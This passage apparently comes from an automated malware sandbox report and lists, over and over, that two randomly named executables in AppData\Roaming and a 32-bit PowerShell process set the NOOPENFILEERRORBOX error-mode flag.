              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
